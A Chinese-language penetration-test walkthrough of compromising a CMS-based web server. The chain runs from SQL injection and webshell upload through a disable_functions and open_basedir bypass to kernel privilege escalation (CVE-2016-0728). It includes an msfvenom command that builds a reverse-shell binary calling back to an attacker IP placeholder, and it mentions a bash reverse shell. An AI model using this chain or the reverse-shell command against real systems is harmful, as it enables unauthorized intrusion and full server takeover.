拿shell+disable_functions绕过+目录突破+提权

0x00前台拿webshell
前期正常信息收集，发现是个cms，然后百度了一波之前的漏洞，找到了延时注入。

一个一个的手工太累了，然后使用py脚本来跑。

把密文拿去MD5解密，得到管理密码。

在后台看到后台上传可以上传文件的类型

找到上传点，然后上传木马

连接到webshell，发现命令都是执行不了的。

在phpinfo里找到disable_functions函数，发现很多命令都被禁用了。

0x01绕过disable_functions
使用蚁剑自带插件成功绕过。

然后到tmp目录查找看看，找到了.sock路径。

把FPM/FCGI地址改为找到的路径，运行生成一个.antproxy.php文件。

连接.antproxy.php发现这个绕过只有一会的时间就会被断开，然后想着在上传木马到靶机，进行反弹shell。

0x02进行反弹shell
先把原来的删除这样然后重新生成。在这里每次重新连接.antproxy.php都要连接重新生成的.antproxy.php。

生成木马
使用msf生成木马，我这里使用的是监听80端口，LHOST是你要接收shell反弹回来的IP，-i 表示编码的次数。
msfvenom -p linux/x64/shell_reverse_tcp -i 5 LHOST=x.x.x.x LPORT=80 -f elf -o /root/shell.elf

然后直接把.elf木马放到目标上，在突破disable_functions的时候会有几分钟的时间可以输入命令。在自己接收反弹shell的机器上开启80监听，然后直接运行木马进行反弹。

0x03目录突破
发现有些目录是浏览不了的。

可以在shell目录下新建.user.ini文件添加open_basedir=:/绕过php.ini的全局限制。

再次访问

0x04提权
查看linux内核版本大于等于2.6.22，可以尝试CVE-2016-0728 提权（网上有很多相关的文章）

一开始编译出现错误，然后修改 PATH

然后运行

上面进行了目录的突破，然后我们还可以使用bash反弹。
找到文件写入bash反弹语句

监听端口。